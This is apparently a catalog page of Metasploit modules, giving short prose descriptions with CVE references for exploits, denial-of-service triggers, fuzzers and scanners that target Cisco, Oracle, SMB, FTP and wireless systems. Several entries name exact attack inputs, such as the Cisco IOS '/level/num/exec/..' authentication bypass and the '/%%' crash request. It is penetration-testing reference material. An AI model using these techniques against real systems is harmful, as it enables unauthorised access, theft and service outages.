Metasploit Penetration Testing Framework

Veritas Backup Exec Windows Remote File Access
This module abuses a logic flaw in the Backup Exec Windows Agent to download arbitrary files from the system. This flaw was found by someone who wishes to remain anonymous and affects all known versions of the Backup Exec Windows Agent. The output file is in 'MTF' format, which can be extracted by the 'NTKBUp' program listed in the references section. To transfer an entire directory, specify a path that includes a trailing backslash. OSVDB-18695 BID-14551 http://www.fpns.net/willy/msb...

Veritas Backup Exec Server Registry Access
This module exploits a remote registry access flaw in the BackupExec Windows Server RPC service. This vulnerability was discovered by Pedram Amini and is based on the NDR stub information posted to openrce.org. Please see the action list for the different attack modes. OSVDB-17627 CVE-2005-0771 http://www.idefense.com/appli...

Cisco IOS HTTP Unauthorized Administrative Access
This module exploits a vulnerability in the Cisco IOS HTTP Server. By sending a GET request for "/level/num/exec/..", where num is between 16 and 99, it is possible to bypass authentication and obtain full system control. IOS 11.3 -> 12.2 are reportedly vulnerable. This module tested successfully against a Cisco 1600 Router IOS v11.3(11d). BID-2936 CVE-2001-0537 http://www.cisco.com/warp/pub... OSVDB-578

Cisco VPN Concentrator 3000 FTP Unauthorized Administrative Access
This module tests for a logic vulnerability in the Cisco VPN Concentrator 3000 series. It is possible to execute some FTP statements without authentication (CWD, RNFR, MKD, RMD, SIZE, CDUP). It also appears to have some memory leak bugs when working with CWD commands. This module simply creates an arbitrary directory, verifies that the directory has been created, then deletes it and verifies deletion to confirm the bug. BID-19680 CVE-2006-4313 http://www.cisco.com/warp/pub... OSVDB-28139 OSVDB-28138

IBM DB2 db2rcmd.exe Command Execution Vulnerability.
This module exploits a vulnerability in the Remote Command Server component in IBM's DB2 Universal Database 8.1. An authenticated attacker can send arbitrary commands to the DB2REMOTECMD named pipe which could lead to administrator privileges. CVE-2004-0795 OSVDB-4180 BID-9821

Novell eDirectory DHOST Predictable Session Cookie
This module is able to predict the next session cookie value issued by the DHOST web service of Novell eDirectory 8.8.5. An attacker can run this module, wait until the real administrator logs in, then specify the predicted cookie value to hijack their session. OSVDB-60035

EMC AlphaStor Device Manager Arbitrary Command Execution
EMC AlphaStor Device Manager is prone to a remote command-injection vulnerability because the application fails to properly sanitize user-supplied input. http://labs.idefense.com/inte... OSVDB-45715 CVE-2008-2157 BID-29398

EMC AlphaStor Library Manager Arbitrary Command Execution
EMC AlphaStor Library Manager is prone to a remote command-injection vulnerability because the application fails to properly sanitize user-supplied input. http://labs.idefense.com/inte... CVE-2008-2157 OSVDB-45715 BID-29398

Titan FTP XCRC Directory Traversal Information Disclosure
This module exploits a directory traversal vulnerability in the XCRC command implemented in versions of Titan FTP up to and including 8.10.1125. By sending multiple XCRC commands, it is possible to disclose the contents of any file on the drive with a simple CRC "brute force" attack. Although the daemon runs with SYSTEM privileges, access is limited to files that reside on the same drive as the FTP server's root directory. OSVDB-65533 http://seclists.org/bugtraq/2...

HP Web JetAdmin 6.5 Server Arbitrary Command Execution
This module abuses a command execution vulnerability within the web based management console of the Hewlett-Packard Web JetAdmin network printer tool v6.2 - v6.5. It is possible to execute commands as SYSTEM without authentication. The vulnerability also affects POSIX systems, however at this stage the module only works against Windows. This module does not apply to HP printers. OSVDB-5798 BID-10224 http://www.milw0rm.com/exploi...

Iomega StorCenter Pro NAS Web Authentication Bypass
The Iomega StorCenter Pro Network Attached Storage device web interface increments session IDs, allowing for simple brute force attacks to bypass authentication and gain administrative access. OSVDB-55586 CVE-2009-2367

Tomcat Administration Tool Default Access
Detect the Tomcat administration interface. http://tomcat.apache.org/

Typo3 sa-2009-002 File Disclosure
This module exploits a file disclosure vulnerability in the jumpUrl mechanism of Typo3. This flaw can be used to read any file that the web server user account has access to. OSVDB-52048 CVE-2009-0815 http://secunia.com/advisories... http://www.milw0rm.com/exploi... http://typo3.org/teams/securi...

SAP MaxDB cons.exe Remote Command Injection
SAP MaxDB is prone to a remote command-injection vulnerability because the application fails to properly sanitize user-supplied input. OSVDB-40210 BID-27206 CVE-2008-0244

Motorola WR850G v4.03 Credentials
Login credentials to the Motorola WR850G router with firmware v4.03 can be obtained via a simple GET request if issued while the administrator is logged in. A lot more information is available through this request, but you can get it all and more after logging in. CVE-2004-1550 OSVDB-10232 http://seclists.org/bugtraq/2...

Microsoft Host Integration Server 2006 Command Execution Vulnerability.
This module exploits a command-injection vulnerability in Microsoft Host Integration Server 2006. MSB-MS08-059 CVE-2008-3466 OSVDB-49068 http://labs.idefense.com/inte...

Microsoft SQL Server Configuration Enumerator
This module will perform a series of configuration audits and security checks against a Microsoft SQL Server database. For this module to work, valid administrative user credentials must be supplied.

Microsoft SQL Server xp_cmdshell Command Execution
This module will execute a Windows command on a MSSQL/MSDE instance via the xp_cmdshell procedure. A valid username and password are required to use this module. http://msdn.microsoft.com/en-...

Microsoft SQL Server - Interesting Data Finder
This module will search the specified MSSQL server for 'interesting' columns and data. The module has been tested against SQL Server 2005 but it should also work on SQL Server 2008. The module will not work against SQL Server 2000 at this time; if you are interested in supporting this platform, please contact the author. http://www.digininja.org/meta...

Microsoft SQL Server Generic Query
This module will allow for simple SQL statements to be executed against a MSSQL/MSDE instance given the appropriate credentials. www.attackresearch.com http://msdn.microsoft.com/en-...

MySQL Enumeration Module
This module allows for simple enumeration of a MySQL Database Server, provided proper credentials to connect remotely are supplied. https://cisecurity.org/benchm...

MySQL SQL Generic Query
This module allows for simple SQL statements to be executed against a MySQL instance given the appropriate credentials.

TrendMicro OfficeScanNT Listener Traversal Arbitrary File Access
This module tests for a directory traversal vulnerability in the UpdateAgent function in the OfficeScanNT Listener (TmListen.exe) service in Trend Micro OfficeScan. This allows remote attackers to read arbitrary files as SYSTEM via dot dot sequences in an HTTP request. OSVDB-48730 CVE-2008-2439 BID-31531 http://www.trendmicro.com/ftp...

SQL Injection via SYS.DBMS_CDC_IPUBLISH.ALTER_HOTLOG_CHANGE_SOURCE.
This module exploits an SQL injection flaw in the ALTER_HOTLOG_INTERNAL_CSOURCE procedure of the PL/SQL package DBMS_CDC_IPUBLISH. Any user with execute privilege on the vulnerable package can exploit this vulnerability. CVE-2008-3996 http://www.oracle.com/technol...

SQL Injection via SYS.DBMS_CDC_PUBLISH.ALTER_AUTOLOG_CHANGE_SOURCE.
This module exploits an SQL injection flaw in the ALTER_AUTOLOG_CHANGE_SOURCE procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute privilege on the vulnerable package can exploit this vulnerability. CVE-2008-3995 http://www.oracle.com/technol...

SQL Injection in SYS.LT.COMPRESSWORKSPACETREE Procedure.
This module will escalate an Oracle DB user to DBA by exploiting an SQL injection bug in the SYS.LT.COMPRESSWORKSPACETREE procedure. Tested on Oracle 10g R1. CVE-2008-3982 http://www.appsecinc.com/reso...

SQL Injection in SYS.LT.MERGEWORKSPACE Procedure.
This module will escalate an Oracle DB user to DBA by exploiting an SQL injection bug in the SYS.LT.MERGEWORKSPACE procedure. CVE-2008-3983 http://www.appsecinc.com/reso...

SQL Injection in SYS.LT.REMOVEWORKSPACE Procedure.
This module will escalate an Oracle DB user to DBA by exploiting an SQL injection bug in the SYS.LT.REMOVEWORKSPACE procedure. CVE-2008-3984 http://www.appsecinc.com/reso...

Oracle SMB Relay Code Execution
This module will help you to get Administrator access to the OS using an unprivileged Oracle database user (you need only CONNECT and RESOURCE privileges). To do this you must first run the smb_sniffer or smb_relay module on your server. Then you must connect to the Oracle database and run this module (Ora_NTLM_stealer.rb), which will connect to your SMB server with the credentials of the Oracle RDBMS. So if smb_relay is working, you will get Administrator access to the server which runs Oracle. If not, then you can crack the HALFLM hash. http://dsecrg.com/pages/pub/s...

Oracle Account Discovery.
This module uses a list of well known default authentication credentials to discover easily guessed accounts. http://www.petefinnigan.com/d... http://seclists.org/fulldiscl...

Oracle SQL Generic Query
This module allows for simple SQL statements to be executed against an Oracle instance given the appropriate credentials and SID. https://www.metasploit.com/us...

Oracle Database Enumeration
This module provides a simple way to scan an Oracle database server for configuration parameters that may be useful during a penetration test. Valid database credentials must be provided for this module to run.

Oracle Secure Backup exec_qr() Command Injection Vulnerability
This module exploits a command injection vulnerability in Oracle Secure Backup version 10.1.0.3 to 10.2.0.2. CVE-2008-5448 OSVDB-51342 http://www.oracle.com/technol... http://www.zerodayinitiative....

Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability
This module exploits an authentication bypass vulnerability in login.php in order to execute arbitrary code via a command injection vulnerability in property_box.php. This module was tested against Oracle Secure Backup version 10.3.0.1.0 (Win32). CVE-2009-1977 OSVDB-55903 CVE-2009-1978 OSVDB-55904 http://www.zerodayinitiative.... http://www.zerodayinitiative....

Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability
This module exploits an authentication bypass vulnerability in login.php in order to execute arbitrary code via a command injection vulnerability in property_box.php. This module was tested against Oracle Secure Backup version 10.3.0.1.0 (Win32). CVE-2010-0904 OSVDB-66338 http://www.zerodayinitiative....

Oracle Java execCommand (Win32)
This module will create a java class which enables the execution of OS commands. https://www.metasploit.com/us...

Oracle URL Download
This module will create a Java class which enables the download of a binary from a web server to the Oracle filesystem. http://www.argeniss.com/resea...

ORACLE SID Brute Forcer.
This module simply attempts to discover the protected SID. https://www.metasploit.com/us... http://www.red-database-secur...

TNSLsnr Command Issuer
This module allows for the sending of arbitrary TNS commands in order to gather information. Inspired by tnscmd.pl from www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd

UoW pop2d Remote File Retrieval Vulnerability
This module exploits a vulnerability in the FOLD command of the University of Washington ipop2d service. By specifying an arbitrary folder name it is possible to retrieve any file which is world or group readable by the user ID of the POP account. This vulnerability can only be exploited with a valid username and password. The From address is the file owner. OSVDB-368 BID-1484

PostgreSQL Server Generic Query
This module imports a file local on the PostgreSQL Server into a temporary table, reads it, and then drops the temporary table. It requires PostgreSQL credentials with table CREATE privileges as well as read privileges to the target file. http://michaeldaw.org/sql-inj...

PostgreSQL Server Generic Query
This module will allow for simple SQL statements to be executed against a PostgreSQL instance given the appropriate credentials. www.postgresql.org

TrendMicro ServerProtect File Access
This module exploits a remote file access flaw in the ServerProtect Windows Server RPC service. Please see the action list (or the help output) for more information. CVE-2007-6507 OSVDB-44318 http://www.zerodayinitiative....

Samba Symlink Directory Traversal
This module exploits a directory traversal flaw in the Samba CIFS server. To exploit this flaw, a writeable share must be specified. The newly created directory will link to the root filesystem. OSVDB-62145 http://www.samba.org/samba/ne...

Solaris KCMS + TTDB Arbitrary File Read
This module targets a directory traversal vulnerability in the kcms_server component from the Kodak Color Management System. By utilizing the ToolTalk Database Server's TT_ISBUILD procedure, an attacker can bypass existing directory traversal validation and read arbitrary files. Vulnerable systems include Solaris 2.5 - 9 SPARC and x86. Both kcms_server and rpc.ttdbserverd must be running on the target host. CVE-2003-0027 OSVDB-8201 BID-6665 http://marc.info/?l=bugtraq&m... http://sunsolve.sun.com/searc...

Symantec System Center Alert Management System Arbitrary Command Execution
Symantec System Center Alert Management System is prone to a remote command-injection vulnerability because the application fails to properly sanitize user-supplied input. CVE-2009-1429 BID-34671 OSVDB-54157 http://www.zerodayinitiative.... http://www.symantec.com/busin...

TikiWiki information disclosure
A vulnerability has been reported in Tikiwiki, which can be exploited by an anonymous user to dump the MySQL user & passwd just by creating a MySQL error with the "sort_mode" var. The vulnerability was reported in Tikiwiki version 1.9.5. OSVDB-30172 BID-20858 CVE-2006-5702 http://secunia.com/advisories...

Webmin file disclosure
A vulnerability has been reported in Webmin and Usermin, which can be exploited by malicious people to disclose potentially sensitive information. The vulnerability is caused by an unspecified error within the handling of a URL. This can be exploited to read the contents of any file on the server via a specially crafted URL, without requiring a valid login. The vulnerability has been reported in Webmin (versions prior to 1.290) and Usermin (versions prior to 1.220). OSVDB-26772 BID-18744 CVE-2006-3392 US-CERT-VU-999601 http://secunia.com/advisories...

Generic Emailer (SMTP)
This module can be used to automate email delivery. This code is based on Joshua Abraham's email script for social engineering. http://spl0it.org/

Cisco IOS HTTP GET /%% request Denial of Service
This module triggers a Denial of Service condition in the Cisco IOS HTTP server. By sending a GET request for "/%%", the device becomes unresponsive. IOS 11.1 -> 12.1 are reportedly vulnerable. This module tested successfully against a Cisco 1600 Router IOS v11.2(18)P. BID-1154 CVE-2000-0380 http://www.cisco.com/warp/pub... OSVDB-1302

FreeBSD Remote NFS RPC Request Denial of Service
This module sends a specially crafted NFS Mount request causing a kernel panic on a host running FreeBSD 6.0. http://lists.immunitysec.com/... BID-16838 OSVDB-23511 CVE-2006-0900

3Com SuperStack Switch Denial of Service
This module causes a temporary denial of service condition against 3Com SuperStack switches. By sending excessive data to the HTTP Management interface, the switch stops responding temporarily. The device does not reset. Tested successfully against a 3300SM firmware v2.66. Reported to affect versions prior to v2.72. OSVDB-7246 CVE-2004-2691 http://support.3com.com/infod...

Apache mod_isapi <= 2.2.14 Dangling Pointer
This module triggers a use-after-free vulnerability in the Apache Software Foundation mod_isapi extension. In order to reach the vulnerable code, the target server must have an ISAPI module installed and configured. By making a request that terminates abnormally (either an aborted TCP connection or an unsatisfied chunked request), mod_isapi will unload the ISAPI extension. Later, if another request comes for that ISAPI module, previously obtained pointers will be used resulting in an access violation or potentially arbitrary code execution. Although arbitrary code execution is theoretically possible, a real-world method of invoking this consequence has not been proven. In order to do so, one would need to find a situation where a particular ISAPI module loads at an image base address that can be re-allocated by a remote attacker. Limited success was encountered using two separate ISAPI modules. In this scenario, a second ISAPI module was loaded into the same memory area as the previously unloaded module. CVE-2010-0425 BID-38494 https://issues.apache.org/bug... http://www.gossamer-threads.c... http://www.senseofsecurity.co... http://www.exploit-db.com/exp...

Dell OpenManage POST Request Heap Overflow (win32)
This module exploits a heap overflow in the Dell OpenManage Web Server (omws32.exe), versions 3.2-3.7.1. The vulnerability exists due to a boundary error within the handling of POST requests, where the application input is set to an overly long file name. This module will crash the web server, however it is likely exploitable under certain conditions. http://archives.neohapsis.com... BID-9750 OSVDB-4077 CVE-2004-0331

Ruby WEBrick::HTTP::DefaultFileHandler DoS
The WEBrick::HTTP::DefaultFileHandler in WEBrick in Ruby 1.8.5 and earlier, 1.8.6 to 1.8.6-p286, 1.8.7 to 1.8.7-p71, and 1.9 to r18423 allows for a DoS (CPU consumption) via a crafted HTTP request. BID-30644 CVE-2008-3656 OSVDB-47471 http://www.ruby-lang.org/en/n...

Avahi < 0.6.24 Source Port 0 DoS
Avahi-daemon versions prior to 0.6.24 can be DoS'd with an mDNS packet with a source port of 0. CVE-2008-5081 OSVDB-50929

NTP.org ntpd Reserved Mode Denial of Service
This module exploits a denial of service vulnerability within the NTP (network time protocol) daemon. By sending a single packet to a vulnerable ntpd server (Victim A), spoofed from the IP address of another vulnerable ntpd server (Victim B), both victims will enter an infinite response loop. Note, unless you control the spoofed source host or the real remote host(s), you will not be able to halt the DoS condition once begun! BID-37255 CVE-2009-3563 OSVDB-60847 https://support.ntp.org/bugs/...

MS02-063 PPTP Malformed Control Data Kernel Denial of Service
This module exploits a kernel based overflow when sending abnormal PPTP Control Data packets to Microsoft Windows 2000 SP0-3 and XP SP0-1 based PPTP RAS servers (Remote Access Services). Kernel memory is overwritten resulting in a BSOD. Code execution may be possible however this module is only a DoS. BID-5807 CVE-2002-1214 OSVDB-13422 MSB-MS02-063

Samba lsa_io_privilege_set Heap Overflow
This module triggers a heap overflow in the LSA RPC service of the Samba daemon. CVE-2007-2446 OSVDB-34699

Samba lsa_io_trans_names Heap Overflow
This module triggers a heap overflow in the LSA RPC service of the Samba daemon. CVE-2007-2446 OSVDB-34699

Sendmail SMTP Address prescan <= 8.12.8 Memory Corruption
This is a proof of concept denial of service module for Sendmail versions 8.12.8 and earlier. The vulnerability is within the prescan() method when parsing SMTP headers. Due to the prescan function, only 0x5c and 0x00 bytes can be used, limiting the likelihood for arbitrary code execution. OSVDB-2577 CVE-2003-0694 BID-8641 http://www.milw0rm.com/exploi...

Solaris LPD Arbitrary File Delete
This module uses a vulnerability in the Solaris line printer daemon to delete arbitrary files on an affected system. This can be used to exploit the rpc.walld format string flaw, the missing krb5.conf authentication bypass, or simply delete system files. Tested on Solaris 2.6, 7, 8, 9, and 10. CVE-2005-4797 BID-14510 OSVDB-18650 http://sunsolve.sun.com/searc...

Juniper JunOS Malformed TCP Option
This module exploits a denial of service vulnerability in Juniper Network's JunOS router operating system. By sending a TCP packet with TCP option 101 set, an attacker can cause an affected router to reboot. BID-37670 OSVDB-61538 http://praetorianprefect.com/...

TCP SYN Flooder
A simple TCP SYN flooder.

Wireless CTS/RTS Flooder
This module sends 802.11 CTS/RTS requests to a specific wireless peer, using the specified source address,

Apple Airport 802.11 Probe Response Kernel Memory Corruption
The Apple Airport driver provided with Orinoco-based Airport cards (1999-2003 PowerBooks, iMacs) is vulnerable to a remote memory corruption flaw. When the driver is placed into active scanning mode, a malformed probe response frame can be used to corrupt internal kernel structures, leading to arbitrary code execution. This vulnerability is triggered when a probe response frame is received that does not contain valid information element (IE) fields after the fixed-length header. The data following the fixed-length header is copied over internal kernel structures, resulting in memory operations being performed on attacker-controlled pointer values. CVE-2006-5710 OSVDB-30180

Wireless DEAUTH Flooder
This module sends 802.11 DEAUTH requests to a specific wireless peer, using the specified source address and source BSSID.

Wireless Fake Access Point Beacon Flood
This module can advertise thousands of fake access points, using random SSIDs and BSSID addresses. Inspired by Black Alchemy's fakeap tool.

Wireless Frame (File) Injector
Inspired by Josh Wright's file2air, this module writes wireless frames from a binary file to the air, allowing you to substitute some addresses before it gets sent. Unlike the original file2air (currently v1.1), this module *does* take into account the ToDS and FromDS flags in the frame when replacing any specified addresses.

NetGear MA521 Wireless Driver Long Rates Overflow
This module exploits a buffer overflow in the NetGear MA521 wireless device driver under Windows XP. When a specific malformed frame (beacon or probe response) is received by the wireless interface under active scanning mode, the MA521nd5.SYS driver attempts to write to an attacker-controlled memory location. The vulnerability is triggered by an invalid supported rates information element. This DoS was tested with version 5.148.724.2003 of the MA521nd5.SYS driver and a NetGear MA521 Cardbus adapter. A remote code execution module is also in development. This module depends on the Lorcon2 library and only works on the Linux platform with a supported wireless card. Please see the Ruby Lorcon2 documentation (external/ruby-lorcon/README) for more information. CVE-2006-6059 OSVDB-30507 http://projects.info-pull.com... ftp://downloads.netgear.com/f...

NetGear WG311v1 Wireless Driver Long SSID Overflow
This module exploits a buffer overflow in the NetGear WG311v1 wireless device driver under Windows XP and 2000. A kernel-mode heap overflow occurs when a malformed probe response frame is received that contains a long SSID field. This DoS was tested with version 2.3.1.10 of the WG311ND5.SYS driver and a NetGear WG311v1 PCI card. A remote code execution module is also in development. This module depends on the Lorcon2 library and only works on the Linux platform with a supported wireless card. Please see the Ruby Lorcon2 documentation (external/ruby-lorcon/README) for more information. CVE-2006-6125 OSVDB-30511 http://projects.info-pull.com... ftp://downloads.netgear.com/f...

Multiple Wireless Vendor NULL SSID Probe Response
This module exploits a firmware-level vulnerability in a variety of 802.11b devices. This attack works by sending a probe response frame containing a NULL SSID information element to an affected device. This flaw affects many cards based on the Choice MAC (Intersil, Lucent, Agere, Orinoco, and the first generation of Airport cards). http://802.11ninja.net/papers... WVE-2006-0064

Wireless Test Module
This module is a test of the wireless packet injection system. Please see external/ruby-lorcon/README for more information.

Appian Enterprise Business Suite 5.6 SP1 DoS
This module exploits a denial of service flaw in the Appian Enterprise Business Suite service. CVE-2007-6509 OSVDB-39500 http://archives.neohapsis.com...

Microsoft Windows EOT Font Table Directory Integer Overflow
This module exploits an integer overflow flaw in the Microsoft Windows Embedded OpenType font parsing code located in win32k.sys. Since the kernel itself parses embedded web fonts, it is possible to trigger a BSoD from a normal web page when viewed with Internet Explorer. CVE-2009-2514 MSB-MS09-065 OSVDB-59869

FileZilla FTP Server Admin Interface Denial of Service
This module triggers a Denial of Service condition in the FileZilla FTP Server Administration Interface in versions 0.9.4d and earlier. By sending a procession of excessively long USER commands to the FTP Server, the Administration Interface (FileZilla Server Interface.exe), when running, will overwrite the stack with the supplied string and generate an exception. The FileZilla FTP Server itself will continue functioning. BID-15346 CVE-2005-3589 http://www.milw0rm.com/exploi... OSVDB-20817

FileZilla FTP Server <=0.9.21 Malformed PORT Denial of Service
This module triggers a Denial of Service condition in the FileZilla FTP Server versions 0.9.21 and earlier. By sending a malformed PORT command then LIST command, the server attempts to write to a NULL pointer. BID-21542 BID-21549 CVE-2006-6565 http://www.milw0rm.com/exploi... OSVDB-34435

Guild FTPd 0.999.8.11/0.999.14 Heap Corruption
Guild FTPd 0.999.8.11 and 0.999.14 are vulnerable to heap corruption. You need to have a valid login so you can run CWD and LIST. CVE-2008-4572 OSVDB-49045 http://milw0rm.com/exploits/6738

Titan FTP Server 6.26.630 SITE WHO DoS
The Titan FTP server v6.26 build 630 can be DoS'd by issuing "SITE WHO". You need a valid login so you can send this command. CVE-2008-6082 OSVDB-49177 http://milw0rm.com/exploits/6753

Victory FTP Server 5.0 LIST DoS
The Victory FTP Server v5.0 can be brought down by sending a very simple LIST command. CVE-2008-2031 CVE-2008-6829 OSVDB-44608 http://milw0rm.com/exploits/6834

WinFTP 2.3.0 NLST Denial of Service
This module is a very rough port of Julien Bedard's PoC. You need a valid login, but even anonymous can do it if it has permission to call NLST. CVE-2008-5666 OSVDB-49043 http://milw0rm.com/exploits/6581

XM Easy Personal FTP Server 5.6.0 NLST DoS
This module is a port of shinnai's script. You need a valid login, but even anonymous can do it as long as it has permission to call NLST. CVE-2008-5626 OSVDB-50837 http://milw0rm.com/exploits/6741

XM Easy Personal FTP Server 5.7.0 NLST DoS
You need a valid login to DoS this FTP server, but even anonymous can do it as long as it has permission to call NLST. CVE-2008-5626 OSVDB-50837 http://milw0rm.com/exploits/8294

Pi3Web <=2.0.13 ISAPI DoS
The Pi3Web HTTP server crashes when a request is made for an invalid DLL file in /isapi. By default, the non-DLLs in this directory after installation are users.txt, install.daf and readme.daf. CVE-2008-6938 OSVDB-49998 http://milw0rm.com/exploits/7109

Microsoft Windows NAT Helper Denial of Service
This module exploits a denial of service vulnerability within the Internet Connection Sharing service in Windows XP. OSVDB-30096 BID-20804 CVE-2006-5614

Microsoft Plug and Play Service Registry Overflow
This module triggers a stack buffer overflow in the Windows Plug and Play service. This vulnerability can be exploited on Windows 2000 without a valid user account. Since the PnP service runs inside the services.exe process, this module will result in a forced reboot on Windows 2000. Obtaining code execution is possible if user-controlled memory can be placed at 0x00000030, 0x0030005C, or 0x005C005C. CVE-2005-2120 MSB-MS05-047 BID-15065 OSVDB-18830

Microsoft SRV.SYS Mailslot Write Corruption
This module triggers a kernel pool corruption bug in SRV.SYS. Each call to the mailslot write function results in a two byte return value being written into the response packet. The code which creates this packet fails to consider these two bytes in the allocation routine, resulting in a slow corruption of the kernel memory pool. These two bytes are almost always set to "\xff\xff" (a short integer with value of -1). BID-19215 OSVDB-27644 CVE-2006-3942 http://www.coresecurity.com/c... MSB-MS06-035

Microsoft SRV.SYS Pipe Transaction No Null
This module exploits a NULL pointer dereference flaw in the SRV.SYS driver of the Windows operating system. This bug was independently discovered by CORE Security and ISS. OSVDB-27644 MSB-MS06-063 CVE-2006-3942 BID-19215

Microsoft SRV.SYS WriteAndX Invalid DataOffset
This module exploits a denial of service vulnerability in the SRV.SYS driver of the Windows operating system. This module has been tested successfully against Windows Vista. MSB-MS09-001 OSVDB-48153 CVE-2008-4114 BID-31179

Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
This module exploits an out of bounds function table dereference in the SMB request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7 release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista without SP1 does not seem affected by this flaw. CVE-2009-3103 BID-36299 OSVDB-57799 MSB-MS09-050 http://seclists.org/fulldiscl... http://www.microsoft.com/tech...

Microsoft SRV2.SYS SMB2 Logoff Remote Kernel NULL Pointer Dereference
This module triggers a NULL pointer dereference in the SRV2.SYS kernel driver when processing an SMB2 logoff request before a session has been correctly negotiated, resulting in a BSOD. Affecting Vista SP1/SP2 (and possibly Server 2008 SP1/SP2), the flaw was resolved with MS09-050. CVE-2009-3103 OSVDB-57799 MSB-MS09-050

Microsoft Windows 7 / Server 2008 R2 SMB Client Infinite Loop
This module exploits a denial of service flaw in the Microsoft Windows SMB client on Windows 7 and Windows Server 2008 R2. To trigger this bug, run this module as a service and force a vulnerable client to access the IP of this system as an SMB server. This can be accomplished by embedding a UNC path (\\HOST\share\something) into a web page if the target is using Internet Explorer, or a Word document otherwise. CVE-2010-0017 OSVDB-62244 MSB-MS10-006 http://g-laurent.blogspot.com...

Microsoft RRAS InterfaceAdjustVLSPointers NULL Dereference
This module triggers a NULL dereference in svchost.exe on all current versions of Windows that run the RRAS service. This service is only accessible without authentication on Windows XP SP1 (using the SRVSVC pipe). OSVDB-64340

Microsoft Vista SP0 SMB Negotiate Protocol DoS
This module exploits a flaw in Windows Vista that allows a remote unauthenticated attacker to disable the SMB service. This vulnerability was silently fixed in Microsoft Vista Service Pack 1. OSVDB-64341

MS06-019 Exchange MODPROP Heap Overflow
This module triggers a heap overflow vulnerability in MS Exchange that occurs when multiple malformed MODPROP values occur in a VCAL request. BID-17908 CVE-2006-0027 MSB-MS06-019

PacketTrap TFTP Server 2.2.5459.0 DoS
The PacketTrap TFTP server version 2.2.5459.0 can be brought down by sending a special write request. CVE-2008-1311 OSVDB-42932 http://milw0rm.com/exploits/6863

SolarWinds TFTP Server 10.4.0.10 Denial of Service
The SolarWinds TFTP server can be shut down by sending a 'netascii' read request with a specially crafted file name. CVE-2010-2115 OSVDB-64845 http://www.exploit-db.com/exp...

Wireshark chunked_encoding_dissector function DOS
Wireshark crashes when dissecting an HTTP chunked response. Versions affected: 0.99.5 (Bug 1394). CVE-2007-3389 OSVDB-37643 https://bugs.wireshark.org/bu...

Wireshark LDAP dissector DOS
The LDAP dissector in Wireshark 0.99.2 through 0.99.8 allows remote attackers to cause a denial of service (application crash) via a malformed packet. CVE-2008-1562 OSVDB-43840

Simple FTP Fuzzer
This module will connect to an FTP server and perform pre- and post-authentication fuzzing.

HTTP GET Request URI Fuzzer (Incrementing Lengths)
This module sends a series of HTTP GET requests with incrementing URL lengths.

HTTP GET Request URI Fuzzer (Fuzzer Strings)
This module sends a series of HTTP GET requests with malicious URIs.

SMB Negotiate SMB2 Dialect Corruption
This module sends a series of SMB negotiate requests that advertise an SMB2 dialect with corrupted bytes.

SMB Create Pipe Request Fuzzer
This module sends a series of SMB create pipe requests using malicious strings.

SMB Create Pipe Request Corruption
This module sends a series of SMB create pipe requests with corrupted bytes.

SMB Negotiate Dialect Corruption
This module sends a series of SMB negotiate requests with corrupted bytes.

SMB NTLMv1 Login Request Corruption
This module sends a series of SMB login requests using the NTLMv1 protocol with corrupted bytes.

SMB Tree Connect Request Fuzzer
This module sends a series of SMB tree connect requests using malicious strings.

SMB Tree Connect Request Corruption
This module sends a series of SMB tree connect requests with corrupted bytes.

SMTP Simple Fuzzer

SSH Key Exchange Init Corruption
This module sends a series of SSH requests with a corrupted initial key exchange payload.

SSH 1.5 Version Fuzzer
This module sends a series of SSH requests with malicious version strings.

SSH 2.0 Version Fuzzer
This module sends a series of SSH requests with malicious version strings.

SSH Version Corruption
This module sends a series of SSH requests with a corrupted version string.

TDS Protocol Login Request Corruption Fuzzer
This module sends a series of malformed TDS login requests.

TDS Protocol Login Request Username Fuzzer
This module sends a series of malformed TDS login requests.

Wireless Beacon Frame Fuzzer
This module sends out corrupted beacon frames.

Wireless Probe Response Frame Fuzzer
This module sends out corrupted probe response frames.

Citrix MetaFrame ICA Published Applications Scanner
This module attempts to query Citrix Metaframe ICA server to obtain a published list of applications. http://www.securiteam.com/exp...

Citrix MetaFrame ICA Published Applications Bruteforcer
This module attempts to brute force program names within the Citrix Metaframe ICA server. OSVDB-50617 BID-5817 http://sh0dan.org/oldfiles/ha...

DNS Enumeration Module
This module can be used to enumerate various types of information about a domain from a specific DNS server. CVE-1999-0532 OSVDB-492

Search Engine Domain Email Address Collector
This module uses Google, Bing and Yahoo to create a list of valid email addresses for the target domain.

Foxit Reader Authorization Bypass
This module exploits an authorization bypass vulnerability in Foxit Reader build 1120. When an attacker creates a specially crafted PDF file containing an Open/Execute action, arbitrary commands can be executed without confirmation from the victim. CVE-2009-0836 OSVDB-55615 BID-34035

Energizer DUO Trojan Scanner
Detect instances of the Energizer DUO trojan horse software on port 7777 CVE-2010-0103 OSVDB-62782 US-CERT-VU-154421

DB2 Authentication Brute Force Utility
This module attempts to authenticate against a DB2 instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options.

DB2 Probe Utility
This module queries a DB2 instance for information.

DB2 Discovery Service Detection.
This module simply queries the DB2 discovery service for information.

Endpoint Mapper Service Discovery
This module can be used to obtain information from the Endpoint Mapper service.

Hidden DCERPC Service Discovery
This module will query the endpoint mapper and make a list of all ncacn_tcp RPC services. It will then connect to each of these services and use the management API to list all other RPC services accessible on this port. Any RPC service found attached to a TCP port, but not listed in the endpoint mapper, will be displayed and analyzed to see whether anonymous access is permitted.

Remote Management Interface Discovery
This module can be used to obtain information from the Remote Management Interface DCERPC service.

DCERPC TCP Service Auditor
Determine what DCERPC services are accessible over a TCP port

DECT Call Scanner
This module scans for active DECT calls Dedected-http://www.dedected.org

DECT Base Station Scanner
This module scans for DECT base stations Dedected-http://www.dedected.org

ARP Sweep Local Network Discovery
Enumerate live hosts on the local network using ARP requests.

UDP Service Prober
Detect common UDP services using sequential probes

UDP Service Sweeper
Detect common UDP services

EMC AlphaStor Device Manager Service.
This module queries the remote host for the EMC AlphaStor Device Management Service.

EMC AlphaStor Library Manager Service.
This module queries the remote host for the EMC AlphaStor Library Management Service.

Finger Service User Enumerator
Identify valid users through the finger service using a variety of tricks

Anonymous FTP Access Detection
Detect anonymous (read/write) FTP server access. http://en.wikipedia.org/wiki/...

FTP Authentication Scanner
